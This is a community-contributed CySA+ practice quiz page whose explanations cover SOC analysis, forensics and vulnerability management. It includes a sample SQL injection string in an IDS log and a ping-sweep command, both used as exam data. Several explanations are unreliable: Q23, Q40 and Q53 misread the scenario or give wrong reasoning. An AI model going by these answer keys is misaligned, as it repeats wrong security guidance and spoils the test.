CSA +

Reviewed by Editorial Team
The ProProfs editorial team is comprised of experienced subject matter experts. They've collectively created over 10,000 quizzes and lessons, serving over 100 million users. Our team includes in-house content moderators and subject matter experts, as well as a global network of rigorously trained contributors. All adhere to our comprehensive editorial guidelines, ensuring the delivery of high-quality content.
Learn about Our Editorial Process
| By Heavenlymixed86
H
Heavenlymixed86
Community Contributor
Quizzes Created: 1 | Total Attempts: 684
| Attempts: 684 | Questions: 142
Please wait...
Question 1 / 142
0 %
0/100
Score 0/100
1. An analyst is observing unusual network traffic from a workstation. The workstation is communication with a known malicious site overran encrypted tunnel. A full antivirus scan with an updates antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation?

Explanation

The correct answer is a zero-day attack. A zero-day attack refers to a cyber attack that exploits a previously unknown vulnerability in a computer application or system. In this scenario, the analyst is observing unusual network traffic from a workstation that is communicating with a known malicious site over an encrypted tunnel. Despite conducting a full antivirus scan with updated antivirus signatures, no signs of infection are found. This suggests that the attack is leveraging a vulnerability that is not yet known to the antivirus software, hence it is a zero-day attack.

Submit
Please wait...
About This Quiz
Cybersecurity Quizzes & Trivia

The CSA+ quiz assesses knowledge in cybersecurity, focusing on attack detection, system security, and preventive measures. It tests skills like traffic analysis, duties separation, log management, and secure... see moreaccess, crucial for IT security professionals. see less

2. Which of the following is MOST effective for correlation analysis by log for threat management?

Explanation

SIEM (Security Information and Event Management) is the most effective option for correlation analysis by log for threat management. SIEM systems collect and analyze log data from various sources, such as network devices, servers, and applications, to identify and correlate security events. By analyzing log data, SIEM can detect patterns and anomalies that may indicate potential threats or security incidents. This helps organizations in threat management by providing real-time monitoring, alerting, and incident response capabilities. PACP (Passive Asset Categorization Protocol), SCAP (Security Content Automation Protocol), and IPS (Intrusion Prevention System) are not specifically designed for correlation analysis by log for threat management.

Submit
3. The director of software development is concerned with recent web application security incidents, including the successful breach of a back-end database server. The director would like to work with the security team to implement a standardized was to design to build, build and test web applications and the services that support them. Which of the following meets this criteria?

Explanation

OWASP (Open Web Application Security Project) is the correct answer because it is an organization that provides resources, tools, and guidelines for web application security. The director's concern with recent security incidents aligns with OWASP's mission to improve the security of web applications. By working with the security team to implement OWASP's standardized design, build, and testing practices, the director can ensure that web applications and their supporting services are developed with security in mind. SANS is also a reputable organization that focuses on cybersecurity, but it does not specifically specialize in web application security like OWASP does. PHP and Ajax are programming languages and technologies, not comprehensive frameworks or guidelines for web application security.

Submit
4. After analyzing ad correlating  activity from multiple sensors, the security analyst has determined a group from a high-risk country is responsible for a sophisticated breach of the company network and continuous administration of target attacks for the past thee months. Until now, the attacks went unnoticed. This is an example of

Explanation

The given scenario describes a situation where a security analyst has analyzed and correlated activity from multiple sensors and determined that a group from a high-risk country has successfully breached the company network and conducted targeted attacks for a prolonged period without being detected. This aligns with the characteristics of an advanced persistent threat (APT), which refers to a long-term, sophisticated attack by a skilled and persistent adversary. The fact that the attacks went unnoticed for three months further supports the idea of an APT, as they often employ stealthy tactics to evade detection.

Submit
5. The director of software development is concerned with recent web application security incidents, including the successful breach of a black-end database server. The director would like to work with the security team to implement a standardized way to design, build and test web applications and services that support them. Which of the following meets that criteria ?

Explanation

OWASP (Open Web Application Security Project) is the correct answer. OWASP provides a set of guidelines, tools, and resources for web application security. By working with the security team to implement OWASP, the director of software development can ensure that web applications and services are designed, built, and tested in a standardized and secure manner. OWASP focuses on identifying and mitigating common web application vulnerabilities, making it an appropriate choice for addressing the concerns raised by recent security incidents. SANS is a well-known organization that offers cybersecurity training and certifications, but it does not specifically focus on web application security. PHP and Ajax are programming languages and technologies, not comprehensive frameworks or guidelines for web application security.

Submit
6. Which of the following commands would a security analyst use to make a copy of an image for forensics use?

Explanation

A security analyst would use the "dd" command to make a copy of an image for forensics use. The "dd" command is commonly used in Linux systems to create a bit-by-bit copy of a file or device. It can be used to clone disks, create disk images, or make backups. By using "dd", the security analyst can ensure that all data, including hidden or deleted information, is preserved in the copy, making it suitable for forensic analysis.

Submit
7. As part of upcoming engagement for client, an analyst is configuring a penetration testing application to ensure the scan the scan complies with information defined in the SOW. Which of the following types of information should be considered based on traditionally found SOW?(select two)

Explanation

Based on traditionally found SOW (Statement of Work), the timing of the scan and excluded hosts are two types of information that should be considered when configuring a penetration testing application. The timing of the scan is important to ensure that it aligns with the client's schedule and does not disrupt their operations. Excluded hosts are also crucial to specify which systems should not be scanned during the testing process, such as critical infrastructure or sensitive systems that could be negatively impacted.

Submit
8. An Administrator has been investigating the way in which an actor has been exfiltrating confidential data from a web server to a foreign host. After a thorough review, the administrator determined the server's BIOS had been modified by rootkit installation. After removing the rootkit and flashing  the BIOS to a known good state, which of the following would BEST protect against future adversary to the BIOS, in case another rootkit is installed?

Explanation

TPM (Trusted Platform Module) data sealing would be the best choice to protect against future adversary to the BIOS. TPM is a hardware chip that securely stores cryptographic keys and provides secure storage and execution of sensitive information. Data sealing ensures that the data can only be accessed by the authorized system and cannot be tampered with. By sealing the BIOS data using TPM, even if another rootkit is installed, it would not be able to modify the BIOS without the authorized system's authentication. This provides a strong defense against future attacks on the BIOS.

Submit
9. Management is concerned with administrator access from outside the network to a key server in the company. Specifically, firewall rules allow access to the server anywhere in the company. Which of the following would be an effective solution?

Explanation

A jump box is a secure computer that serves as an intermediary between external networks and the key server. It acts as a single access point for administrators, allowing them to connect to the jump box first and then access the key server. This setup adds an extra layer of security by reducing direct access to the key server from outside the network. It also allows for better monitoring and control over administrator access, as all connections are funneled through the jump box.

Submit
10. An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server's BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against adversary access to the BIOS, in case another rootkit is installed?

Explanation

TPM (Trusted Platform Module) data sealing would best protect against adversary access to the BIOS in case another rootkit is installed. TPM is a hardware-based security feature that stores cryptographic keys and provides secure storage and processing of sensitive information. By sealing the data with TPM, it ensures that the data can only be accessed or decrypted on the same system with the same TPM, preventing unauthorized access even if a rootkit is installed. Anti-malware applications, host-based IDS, and file integrity monitoring are important security measures but may not provide the same level of protection as TPM data sealing in this scenario.

Submit
11. The Chief Information Security Officer (CISO) has asked the security staff to identify a framework on which to base the security program. The CISO would like to achieve a certification showing the security program meets all the required best practices. Which of the following would be the BEST choice.

Explanation

ISO (International Organization for Standardization) would be the best choice for the CISO to base the security program on and achieve a certification showing that it meets all the required best practices. ISO provides internationally recognized standards for various aspects of business operations, including information security. By adopting ISO standards, the security program can ensure that it follows a comprehensive and systematic approach to managing information security risks, thereby demonstrating its commitment to best practices and compliance with industry standards.

Submit
12. A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to ass addition security to this device?

Explanation

Placing the device behind a Web Application Firewall (WAF) is the best recommendation to enhance security. A WAF can inspect and filter incoming traffic, detecting and blocking common SQL injection attacks before they reach the vulnerable user interface. It acts as a protective shield, preventing unauthorized access and reducing the risk of successful attacks. This solution is particularly useful when the device cannot be replaced or upgraded, as it adds an additional layer of security without requiring any changes to the device itself.

Submit
13. A company has recently launched a new billing invoice for a few key vendors. The cybersecurity analyst is receiving calls that the website is preforming slowly and the pages sometimes time out. The analyst notices the website is receiving millions of a request, causing the services to become unavailable. Which of the following can be implemented to maintain the availability of the website?

Explanation

Whitelisting can be implemented to maintain the availability of the website. By using whitelisting, the cybersecurity analyst can create a list of trusted IP addresses or domains that are allowed to access the website. This will block any unauthorized requests from reaching the website, reducing the load on the server and preventing it from becoming unavailable. Whitelisting ensures that only legitimate traffic is allowed, mitigating the impact of the millions of requests and improving the website's performance and availability.

Submit
14. A blue team hunted for identified a previously unknown malicious binary, for which they would like to analyze behavior. When preforming this analysis, the use of which of the following would provide the BEST protection against further downstream infection of assets?

Explanation

Sandboxing would provide the best protection against further downstream infection of assets. Sandboxing involves running the malicious binary in a controlled environment, isolating it from the rest of the system. This prevents any potential harm or infection from spreading to other assets. By containing the binary within the sandbox, the blue team can analyze its behavior without risking the security of other assets on the network.

Submit
15. A cybersecurity analyst traced the source of an attack to compromised user credentials. Log analysis revealed that the attacker successfully authenticated from an unauthorized foreign country. Management asked the security analyst to research an implement a solution to help mitigate attacks based on compromised passwords. Which of the following should the analyst implement? 

Explanation

Context-based authentication should be implemented to help mitigate attacks based on compromised passwords. This type of authentication takes into account various contextual factors such as the user's location, device, and behavior patterns to determine if the login attempt is legitimate. By analyzing these factors, the system can detect suspicious activity, such as authentication from an unauthorized foreign country in this case, and prompt for additional verification or deny access altogether. This helps to enhance the security of the authentication process and prevent unauthorized access even if the attacker has compromised valid user credentials.

Submit
16. A cybersecurity analyst is conduction a security test to ensure the information regarding the web server is protected from disclosure. The cybersecurity analyst requested HTML file form the web server, and response came back as follows:​HTTP/1.1 404 Object Not Found​Server: Microsoft-IIS/5.0​Date: Tues, 19 Apr 2016 09;32;24 GMTContent-Type: text/htmlContent-Length: 111​<html><head><title>Site Not Found</title></head>​<body> No web site is configured at this address. </body></html>​Which of the following actions should be taken to remediate this security issue?

Explanation

The correct action to remediate this security issue is to set "Removeserverheader" to 1 in the URLScan.ini configuration file. This will remove the server header information from the response, which can help prevent potential attackers from gaining information about the web server and its vulnerabilities.

Submit
17. A recent vulnerability scan found four vulnerabilities on an organization's public Internet-facing IP addresses. Prioritizing in order to reduce the risk of a breach to the organization, which of the following should be remediated FIRST?

Explanation

The buffer overflow that allows remote code execution should be remediated first because it poses the highest risk to the organization. A buffer overflow vulnerability can be exploited by an attacker to execute arbitrary code on the system, potentially gaining unauthorized access and control. This type of vulnerability is highly dangerous as it can lead to complete compromise of the system and sensitive data. Therefore, addressing this vulnerability promptly is crucial to minimize the risk of a breach.

Submit
18. During a routine review of firewall logs, an analyst identified that an address from the organizations server subnet had been conducted during nighttime house to a foreign IP address and had been sending between 150 and 500 megabytes of data each time. This had been going on for approximately one wee, and the affected server was taken offline for forensic review. Which of the following is MOST likely to drive up the incident's impact assessment?

Explanation

The exfiltration of PII (Personally Identifiable Information) of company employees and customers is likely to drive up the incident's impact assessment. PII includes sensitive data such as names, addresses, social security numbers, and financial information. The unauthorized access and exfiltration of this data can lead to severe consequences, including identity theft, financial loss, and reputational damage for both the organization and the individuals affected. It would require extensive mitigation efforts, legal obligations, and potential financial liabilities to address the breach and protect the affected individuals.

Submit
19. A recent audit has uncovered several coding errors and a lack of input validation being used on a public portal. Due to the nature of the portal and the severity of the errors, the portal is unable to be patched. Which of the following tools could be used to reduce the risk of being compromised?

Explanation

A web application firewall can be used to reduce the risk of being compromised in this scenario. A web application firewall is specifically designed to protect web applications from common attacks such as SQL injection, cross-site scripting, and other vulnerabilities. Since the audit has uncovered coding errors and a lack of input validation on the public portal, a web application firewall can help mitigate these risks by monitoring and filtering incoming and outgoing traffic to the application, blocking any malicious requests or attempts to exploit the vulnerabilities. This can help protect the portal and its users from potential attacks.

Submit
20. A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to preform? 

Explanation

The best action for the cybersecurity analyst to perform in this scenario is to inform management of the incident. By doing so, management can be made aware of the ongoing DDoS attack and can take appropriate actions to mitigate the attack and minimize its impact on the systems. This allows for a coordinated response and ensures that the necessary resources and measures are put in place to address the issue effectively.

Submit
21. While a threat intelligence analyst was researched an indicator of compromise on a search engine, the web proxy generated an alert the same indicator. The threat analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this solution?

Explanation

The correct answer is "The analyst has prefetch enabled on the browser in use." This means that the browser is preloading web pages in the background based on the analyst's search queries, even if the analyst did not actually visit those sites. This prefetching feature could have triggered the alert from the web proxy.

Submit
22. During the post-seizure analysis of a workstation, the technician discovers a large archive on an image that forensic tools suite is unable to access. The technician Is prompted for authorization credentials when attempting to open the files manually. Which of the following tools would be MOST appropriate to use on the archive to gain access.

Explanation

A password cracker would be the most appropriate tool to use on the archive in order to gain access. Since the technician is prompted for authorization credentials when attempting to open the files manually, it suggests that the archive is password protected. A password cracker is designed to systematically attempt different combinations of passwords until the correct one is found, allowing the technician to gain access to the files within the archive.

Submit
23. A system Administrator has reviewed the following output#nmap server.local​Nmap scan report for server.localHost is up (0.3452345s latency)​Not shown: 997 closed ports​Port           State         Service22/tcp       open           'ssh​80tcp         open            http#nc server. local 80​220 server. local company SMTP server (postfix/2.3.3)      #nc server. local 22​SSH-2. 0-OpenSSH_7.1p2 Debian-2#​Which of the following can a system administrator infer from the above output

Explanation

The output shows that port 22 (SSH) and port 80 (HTTP) are open, but there is no mention of the email server running on any port. Therefore, the system administrator cannot infer anything about the company email server from this output.

Submit
24. A security analyst has been asked to remediate a server vulnerability.Once the analyst has located a patch for the vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT?

Explanation

After locating a patch for the vulnerability, the next step should be to start the change control process. This process ensures that any changes made to the server, in this case, the implementation of the patch, are properly documented, reviewed, and approved. It helps maintain the integrity and stability of the system by ensuring that changes are made in a controlled and organized manner, minimizing the risk of introducing new vulnerabilities or causing disruptions.

Submit
25. File integrity monitoring states the following files have been change. The following change has been made: Chmod 777 -Rv/usrWhich of the following may be occurring?

Explanation

The correct answer is that administrative commands have been made world readable/writable. This is indicated by the command "Chmod 777 -Rv/usr" which changes the permissions of the /usr directory to allow read, write, and execute access for all users. By making the administrative commands world readable/writable, any user can potentially modify or execute these commands, which can pose a security risk.

Submit
26. A cybersecurity analyst has identified a new mission-essential function that utilizes a public cloud-based system. The analyst needs to classify the information processed by the system with respect to the CIA. Which of the following should provide the CIA classification for the information?

Explanation

The data owner should provide the CIA classification for the information because they are responsible for determining the sensitivity and importance of the data. They have the knowledge and authority to classify the information based on its confidentiality, integrity, and availability requirements. The data owner can assess the potential risks and impact of unauthorized access, modification, or loss of the data and make informed decisions regarding its classification.

Submit
27. Nmap scan results on a set of IP addresses returned one or more lines beginning with "cpe:/o. "followed by a company name, product name, and version. Which of the following would this string help an administrator identify?

Explanation

The string "cpe:/o." followed by a company name, product name, and version indicates the operating systems installed on the scanned IP addresses. This information can help an administrator identify the specific operating systems being used by the devices on the network.

Submit
28. An executive tasked a security analyst to aggregate past lost, traffic and alerts on a particular vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely con conditioning?  

Explanation

The security analyst is most likely conducting trend analysis. Trend analysis involves analyzing past data and identifying patterns or trends to make predictions about future outcomes. In this case, the analyst is aggregating past lost, traffic, and alerts on a specific attack vector and using that data to predict future complications related to that vector. This aligns with the concept of trend analysis, which focuses on identifying and analyzing patterns over time to make informed predictions.

Submit
29. An organization wants to harden its web servers. As part of this goal, leadership has directed that vulnerability scan be preformed and the security team should remediate the servers according to the industry best practices. The team has already chosen a vulnerability scanner and preformed the necessary scan, and now the team needs to prioritize the fixes. Which of the following would help to prioritize the vulnerabilities for remediation in accordance with the industries best practices?

Explanation

CVSS (Common Vulnerability Scoring System) is a widely recognized industry standard for assessing and prioritizing vulnerabilities. It provides a numerical score to each vulnerability based on its severity, impact, and exploitability. By using CVSS, the security team can prioritize the fixes based on the highest-scoring vulnerabilities, ensuring that the most critical issues are addressed first. This approach aligns with industry best practices and helps the organization effectively remediate the vulnerabilities on its web servers.

Submit
30. A technician is running an intensive vulnerability scan to detect which port are open to exploit. During the scan, several network resources are disables and production is affected. Which of the following sources would be used to evaluate which network service was interrupted?

Explanation

Syslog is a standard protocol used for sending and receiving log messages in a network. It is commonly used to collect and store log data from various devices, including network devices and servers. In this scenario, when the technician is running the vulnerability scan and network resources are disabled, syslog can be used to evaluate which network service was interrupted. It can provide information about the events and activities happening in the network, including any errors or disruptions that occurred during the scan. By analyzing the syslog data, the technician can identify the specific network service that was affected and take appropriate actions to resolve the issue.

Submit
31. Which of the following BEST describes the offensive participants in a tabletop exercise?

Explanation

A tabletop exercise is a simulation of a real-life scenario where participants play different roles to test and improve their response to a potential incident. The offensive participants in a tabletop exercise are commonly referred to as the "Red team." Their role is to act as the attackers, attempting to exploit vulnerabilities and breach the system's security. The Red team's objective is to identify weaknesses in the system and provide valuable insights into potential threats and vulnerabilities. They help organizations assess their security measures and develop effective strategies to enhance their overall defense capabilities.

Submit
32. An HR employee began having issues with a device becoming unresponsive after attempting to open an e-mail attachment. When informed the security analyst became suspicious of the situation, even though there were not an unusual behavior on the IDS or any alert from the antivirus software. Which of the following BEST describes the type of threat in this situation?

Explanation

In this situation, the HR employee experienced issues with a device becoming unresponsive after attempting to open an email attachment. The security analyst became suspicious because there were no unusual behavior on the IDS or any alert from the antivirus software. This suggests that the threat is a zero-day malware, which refers to a type of malicious software that exploits vulnerabilities in software or systems that are unknown to the software developers or security community. Since there were no prior alerts or detection for this malware, it falls under the category of a zero-day threat.

Submit
33. A security analyst is creating baseline system images to remediate vulnerabilities found in different operation systems. Each image needs to be scanned before its deployed. The security analyst must ensure the configurations match industry standard benchmarks and the process can be repeated frequently. Which of the following vulnerability options would BEST create the process requirements? 

Explanation

Utilizing an operating system SCAP plugin would be the best option to create the process requirements. SCAP (Security Content Automation Protocol) is a standardized method for assessing and managing the security configuration of computer systems. By using an operating system SCAP plugin, the security analyst can ensure that the system configurations match industry standard benchmarks. Additionally, the process can be repeated frequently to continuously monitor and remediate vulnerabilities in the system images. This option provides a comprehensive and efficient approach to scanning and remediating vulnerabilities in different operating systems.

Submit
34. A threat intelligence feed has posted an alert stating there is a critical vulnerability in the kernel. Unfortunately, the company's asset inventory is not current. Which of the following techniques would a cybersecurity analyst perform to find all affected servers within an organization ?

Explanation

An OS fingerprinting scan across all hosts would be performed by a cybersecurity analyst to find all affected servers within an organization. OS fingerprinting is a technique used to identify the operating system running on a particular device by analyzing its network behavior and characteristics. By conducting an OS fingerprinting scan across all hosts, the analyst can identify the operating systems of the servers and determine if they are vulnerable to the critical vulnerability in the kernel mentioned in the threat intelligence feed. This scan helps in identifying the affected servers and taking appropriate actions to mitigate the vulnerability.

Submit
35. A small bank employs an administrator who manages configurations, preforms updates to servers, creates accounts, and reviews audit logs. The bank recently received a write up from a third-party preformed security assessment attributed to this administrator's job details. The insufficiency of which of the following controls was MOST likely to have caused citation. 

Explanation

The insufficiency of separation of duties was most likely to have caused the citation. Separation of duties is a control measure that ensures that no single individual has complete control over a process or system. In this case, the administrator is responsible for multiple tasks such as managing configurations, performing updates, creating accounts, and reviewing audit logs. Without proper separation of duties, there is a higher risk of fraud, errors, and unauthorized activities going undetected. The third-party security assessment likely identified this lack of control as a potential vulnerability in the bank's security measures.

Submit
36. A system administrator who was using an account with elevated privileges deleted a large amount of log files generate by a virtual hypervisor in order to free up disk. These logs are needed by security team to analyze the health of the virtual machines. Which of the following compensating controls would help prevent this from reoccurring? (select two)

Explanation

Separation of duties would help prevent this from reoccurring by ensuring that the system administrator with elevated privileges does not have the ability to delete log files. Personnel training would also help by educating the system administrator on the importance of the log files and the potential consequences of deleting them.

Submit
37. A company that is hiring a penetration tester want to exclude social engineering from the list of authorized activities. Which of the following documents should include these details?

Explanation

The "Rules of engagement" document should include the details of excluding social engineering from the list of authorized activities. This document outlines the scope, objectives, and limitations of the penetration testing engagement. It specifies what actions are allowed and what are not allowed during the testing process. By including the exclusion of social engineering in the "Rules of engagement," the company clearly communicates its expectations to the penetration tester and ensures that they adhere to the desired testing boundaries.

Submit
38. Which of the following are essential components within the rules of engagement for penetration test? (select two)

Explanation

The schedule is an essential component within the rules of engagement for a penetration test because it outlines the timeframe in which the test will be conducted, ensuring that it is conducted within a specified time period. Authorization is also essential as it ensures that the penetration test is conducted with proper permission from the organization, ensuring legal and ethical compliance. The other options, such as the list of system administrators, payment terms, and business justification, are not directly related to the rules of engagement for a penetration test.

Submit
39. An organization has recently recovered from an incident where a managed switch had been accessed and reconfigured without authorization by an insider. The incident response team is working on developing a lessons learned report with recommendations. Which of the following recommendations would be BEST to prevent the same attack from occurring in the future?

Explanation

Implementing a separate logical network segment for management interfaces would be the best recommendation to prevent the same attack from occurring in the future. This would ensure that the management interfaces are isolated from the rest of the network, making it more difficult for unauthorized access and configuration changes to occur. By separating the management interfaces, any potential insider threat would have limited access and would not be able to easily compromise the switch. This recommendation would enhance the security of the network and prevent similar incidents from happening again.

Submit
40. A security analyst wants to scan the network for active hosts. Which of the following characteristics can help to differentiate between a virtual and physical host?

Explanation

Reserved MACs can help differentiate between a virtual and physical host. In virtual environments, MAC addresses are often generated dynamically, whereas physical hosts typically have fixed, reserved MAC addresses assigned to their network interface cards (NICs). By examining the MAC addresses of the hosts on the network, the security analyst can identify those with reserved MACs as physical hosts, while hosts with dynamically generated MACs are likely to be virtual machines.

Submit
41. Which of the following is a feature if virtualization that can potentially create a singe point of failure?

Explanation

Sever consolidation is a feature of virtualization that can potentially create a single point of failure. When multiple servers are consolidated onto a single physical server, if that server fails, it can result in the failure of all the consolidated servers. This is because all the virtual machines are running on the same physical hardware, and if that hardware fails, it can lead to a complete system outage. Therefore, sever consolidation can introduce a single point of failure in virtualized environments.

Submit
42. A security audit revealed that port 389 has been used instead of 636 when connection to LDAP for the authentication of users. The remediation recommended by the audit was to switch the port to 636 whenever technically possible. Which of the following is the best response?

Explanation

The correct answer is to change all devices and servers that support it to port 636 because encrypted services run by default on this port. This ensures that the authentication of users is done securely and reduces the risk of unauthorized access or data breaches. Using port 636 also aligns with the recommended remediation from the security audit, which aims to improve the overall security posture of the system.

Submit
43. A cyber security analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given the list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output?

Explanation

Splunk would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output. Splunk is a powerful log management and analysis tool that allows the analyst to easily search, analyze, and visualize log data from various sources. It provides advanced search capabilities, real-time monitoring, and customizable dashboards, making it an ideal choice for efficiently analyzing log files.

Submit
44. A security analyst is reviewing IDS logs and notices the following entry:​(where [email protected] and passwords=' or 20==20')​Which of the following attacks is occurring?

Explanation

The given entry in the IDS logs indicates a SQL injection attack. In this attack, the attacker is attempting to exploit a vulnerability in the system by manipulating the SQL query. The use of the "or 20==20" statement in the passwords field suggests that the attacker is trying to bypass the authentication mechanism by injecting a condition that always evaluates to true. This type of attack can allow the attacker to gain unauthorized access to the database and potentially extract or modify sensitive information.

Submit
45. A reverse engineer was analyzing malware found on a retailers network and found code extracting data in memory. Which of the following threats did the engineer MOST likely uncover?

Explanation

The reverse engineer most likely uncovered POS malware. POS malware refers to malicious software that is specifically designed to target point-of-sale systems, such as those used by retailers. This type of malware is used to steal sensitive data, such as credit card information, from the retailer's network. The fact that the engineer found code extracting data in memory suggests that the malware was specifically designed to target and extract information from the point-of-sale system.

Submit
46. A software patch has been released to remove vulnerabilities from company software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following test should be preformed NEXT?

Explanation

Regression testing should be performed next. Regression testing is a type of software testing that is conducted to ensure that changes or fixes made to the software have not introduced new defects or caused any existing functionality to break. In this case, since a software patch has been released to remove vulnerabilities, regression testing would help verify that the vulnerabilities have indeed been remediated and that the application is still functioning properly after the patch has been applied.

Submit
47. A cybersecurity has received a laptop of a user who recently left the company. The analyst types into the prompt and sees this line of code in the latest bash history:​> for  I  in seq 255, ping -c 1 192.168.0$i; done​This concerns the analyst because the subset should not be know to user within the company. Which of the following describes what this code has done on the  network?

Explanation

The code in the bash history has performed a ping sweep of a class C network. This means that it has sent ping packets to each host within the network range in order to determine which hosts are active and responsive. This information could be used for various purposes, such as identifying potential vulnerabilities or mapping out the network topology.

Submit
48. As part of the SDLC, software developers are testing the security of a new web application by inputting large amounts of random data. Which of the following types of testing is being preformed?

Explanation

The correct answer is fuzzing. Fuzzing is a type of testing where software developers input large amounts of random data into a system to test its security. This is done to identify vulnerabilities and potential issues in the application. Fuzzing helps to uncover unexpected behavior and can be an effective technique for finding security flaws in software.

Submit
49. A technician is running an intensive vulnerability scan to detect which port are open to exploit. During the scan, network services are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted?

Explanation

Syslog is a protocol used for collecting and sending system log messages. It can provide valuable information about events and activities happening on a network. In this scenario, when network services are disabled and production is affected during the vulnerability scan, syslog can be used to evaluate which network service was interrupted. Syslog messages can help identify any errors or disruptions that occurred during the scan, allowing the technician to pinpoint the specific network service that was affected.

Submit
50. Which of the following best practices is used to identify areas in the network that may vulnerable to penetration testing from external sources? 

Explanation

Blue team training exercises are used to identify areas in the network that may be vulnerable to penetration testing from external sources. These exercises involve simulating real-world cyber attacks on the network to test its defenses and identify potential weaknesses. By conducting these exercises, the blue team can assess the effectiveness of their security measures and identify areas that need improvement or further protection. This helps in proactively addressing vulnerabilities and enhancing the overall security posture of the network.

Submit
51. After running a packet analyzer on the network, a security has notice the following output;11:52:04 10.10.10.65.39769 > 192.168.50.147.80;s 2585925862 : 2585925862 (0) win 4096 (ttl 29, id 48666)11:52:04 10.10.10.65.39769 > 192.168.50.147.81;s 2585925862 : 2585925862 (0) win 4096 (ttl 29, id 65179)11:52:04 10.10.10.65.39769 > 192.168.50.147.83;s 2585925862 : 2585925862 (0) win 4096 (ttl 29, id 42056)11:52:04 10.10.10.65.39769 > 192.168.50.147.82;s 2585925862 : 2585925862 (0) win 4096 (ttl 29, id 41568)Which of the following is occurring? 

Explanation

The given output shows multiple packets being sent from the source IP address 10.10.10.65 to the destination IP address 192.168.50.147 on different ports (80, 81, 83, and 82). The fact that the destination ports are different suggests that the attacker is trying to scan for open ports on the target system. This is a characteristic behavior of a port scan, where an attacker systematically scans a range of ports on a target system to identify potential vulnerabilities or services running on those ports. Therefore, the correct answer is a port scan.

Submit
52. A vulnerability scan has returned the following informationDetailed Results​10.10.10.214 (LOTUS-10-214)​Windows Shares​Category: Windows​CVE ID : -Vendor Ref: -Bugtraq ID : -Service Modified - 4.16.2014Enumeration Results:print$ C:\windows\system32\spool\drivers​ofscan C:\Programs Files\ Trend Micro\ OfficeScan\PCCSRVTemp C:\temp​Which of the following described the meaning of these results?

Explanation

The vulnerability scan results indicate that by connecting to the host using a null session, it is possible to enumerate the share names. This means that an attacker can gain access to the shared files and folders on the Windows server (LOTUS-10-214) without providing any authentication credentials. This vulnerability should be addressed and mitigated to prevent unauthorized access to sensitive information.

Submit
53. A security analyst is adding input to the incident response communication plan. A company office has suggested that if a data breach occurs, only affected parties should be notified to keep an incident from becoming a media headline. Which of the following should the analyst recommend to the company officer?

Explanation

The analyst should recommend that the first responder contacts law enforcement upon confirmation of a security incident to preserve the chain of custody for forensic purposes. This is important because law enforcement agencies have the expertise and resources to properly handle and investigate security incidents. By involving law enforcement, the company can ensure that any evidence collected will be admissible in court if necessary. Preserving the chain of custody is crucial to maintain the integrity and credibility of the evidence, which is essential for a successful investigation and potential legal proceedings.

Submit
54. A security analyst is preforming a review of Active directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company's sensitive financial management application by default. Which of the following is the BEST course of action?

Explanation

The best course of action in this scenario is to confirm the validity of the newly discovered user accounts and ensure that their role-based permissions are appropriate. This is important because the accounts have access to the company's sensitive financial management application by default, even though they do not have elevated permissions. By confirming their validity and reviewing their permissions, the security analyst can ensure that only authorized individuals have access to sensitive information and prevent any potential security breaches or unauthorized access.

Submit
55. Company A permits visiting business patterns from a Company B to utilize Ethernet port available in Company A's conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company B's network. The security architect for a Company A wants to ensure partner from a Company B are able to gain direct internet access from available ports only, while Company A employees can gain access to the company A internal network from those same port. Which of the following can be employed to allow this?

Explanation

NAC (Network Access Control) can be employed to allow partners from Company B to gain direct internet access from available ports only, while Company A employees can gain access to the company A internal network from those same ports. NAC allows for the enforcement of access policies based on user identity, device type, and other factors, ensuring that only authorized users and devices can access specific resources. By implementing NAC, the security architect can control and differentiate the access privileges for partners and employees, meeting the requirements of the situation described.

Submit
56. When preparing for a third-party audit, the vice president of risk management and the vice president of information technology have stipulated the vendor  may not offensive software during the audit. This is an example of:

Explanation

The given scenario describes a situation where the vice president of risk management and the vice president of information technology have set a condition that the vendor should not use offensive software during the audit. This condition is an example of "rules of engagement" as it outlines the specific guidelines and expectations for the vendor's behavior during the audit process. Rules of engagement are commonly used in business relationships to establish boundaries and ensure that all parties involved are aware of the expected conduct.

Submit
57. An analyst has received unusual alerts on the SIEM dashboard. The analyst wants to get payloads that the hackers are sending toward the target systems without impacting the business operation. Which of the following should the analyst implement?

Explanation

A honeypot is a decoy system that is designed to attract hackers and gather information about their activities. By implementing a honeypot, the analyst can create a realistic target system that appears vulnerable to hackers. This allows the analyst to monitor the payloads that the hackers are sending without impacting the actual business operation. The honeypot acts as a trap, luring the hackers away from the real target systems while providing valuable insight into their tactics and techniques.

Submit
58. A cybersecurity professional typed in a URL an discovered the admin panel for the e-commerce application over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability?

Explanation

The most secure solution to remediate this vulnerability is to change the user name and default password, whitelist specific source IP addresses, and require two-factor authentication. By changing the user name and default password, it ensures that the admin panel is not accessible with the default credentials. Whitelisting specific source IP addresses adds an extra layer of security by only allowing access from trusted sources. Requiring two-factor authentication adds another level of protection by requiring an additional verification step, making it harder for unauthorized users to gain access.

Submit
59. A security analyst has created an image of a drive from an incident. Which of the following describes what the analyst should do NEXT?

Explanation

The analyst should create a hash of the image and compare it to the original drive's hash to ensure the integrity and authenticity of the image. This process helps in verifying that the image has not been tampered with and is an accurate representation of the original drive. By comparing the hashes, the analyst can determine if any changes have been made to the image, which could potentially impact the analysis and findings.

Submit
60. A cyber security analyst is completing an organizations vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report?

Explanation

